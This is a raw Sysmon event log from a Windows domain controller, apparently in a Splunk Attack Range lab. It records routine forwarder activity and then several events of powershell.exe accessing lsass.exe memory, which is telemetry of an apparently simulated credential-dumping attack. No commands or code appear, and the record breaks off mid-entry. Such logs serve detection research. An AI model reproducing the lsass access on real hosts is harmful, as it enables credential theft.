16:54:31.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF939656B81267F3AFAF402D7FE4FF7,SHA256=B18C0A61F3A6CA8CAD968B9FC306DEBA087FBFC0F13FCDF4F640C8E73D11421D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:32.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E1AFCD47EAF57C0C9E72654AC6CEE0F,SHA256=F7D5E3580EEA38EADF5E2F17047BF118E09CB851DE03E1F649E44A477184365A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:32.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDD99FBF4E0E66113CE63EB01D9398B,SHA256=0770BA45F26BF512E0EE8FA5A6D757776AD4DB48BB7DBDF6CBFB0D6D5C7A2DA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002241735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:23.256{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60153-false10.0.1.12-8000- 354300x80000000000000002241734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:22.755{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1win-dc-974.attackrange.local64227-false127.0.0.1win-dc-974.attackrange.local53domain 23542300x80000000000000002241733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:33.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4A4C5D8349FFC50E0CE5557430D818D,SHA256=9FBA8CB44D3F4A289EF88404B22EFF19DA0301087913DC7459D1C2E149F5A570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:34.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AE8E58142459FFA1D5020281A8E1ABE,SHA256=4AE4A6CACCE61140425499D8D5180FF0727ECB41B93564713813DE507A29EC10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:35.470{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6C519FF95E5F2C8DFEFC7029A1EEB64,SHA256=9D3C1692004128CC89B712725AFA177A6A981B3CCE502278213E55F5669D893C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:36.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0A0CB47484A1AE997416BF13DD99D15,SHA256=2CD6867CD6A2E2E33279CE3036045857098B8E45C7346C9824ADA2D6FE20243A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:36.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A17349159A4A19547E45F588E2750D81,SHA256=FAC8C227347DDAB2BC64F04E40876A0FAE96F630CF276E4BB713E0B71A219AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:36.404{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:37.529{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE13B92695DEC0CF9F2774CAE2661997,SHA256=C7FF551E19416FA415D0E81C65B3FD599B2CEAE3A1C6E536A5581FBEB4EBA727,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002241741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:27.537{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60154-false10.0.1.12-8089- 354300x80000000000000002241745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:28.272{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60155-false10.0.1.12-8000- 23542300x80000000000000002241744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:38.565{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B8A358A9E1674B5F44F78D9C538B2E6,SHA256=950EABE1265B52860797C14C452B73252B0155DAAA78992BB26E99F8E13A068F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:38.123{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63CD4CC2F5EF6E8C73F04D6063D41DBC,SHA256=A9074E8B9089EEC6AD65E2B056BF2E805BC9655D8B17922FDFF085B8229FE2EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:39.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E04B66D11BE121835E74DA08B453632,SHA256=33E2F2095C73BA9516274A5AE2CC4FA97C98D8B48CC27418C6C46E28472204FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:39.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1152D5DB87909FB399181BC04095425,SHA256=9B9359849EC9EB10F2965EE2042D6A1BC99ADD6754B594ECEC682717EF81E36A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:40.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7C7B85CDE00D7FE4C74BAEE1A5C5D9,SHA256=7D67AF3C29DE730AA8B06989D6C0207081B03C53241C7F609F0DF05B352627BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002241749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:41.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD94AC7FE39F232BD692B9E4CE942CD,SHA256=7F4F7232A2CBEAAA7422EB9F5C6A82AEF581B97F628930C127F4911856C4C3EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D5AA-00000000AD01}15664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D3AA-00000000AD01}15816C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D1AA-00000000AD01}5496C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\R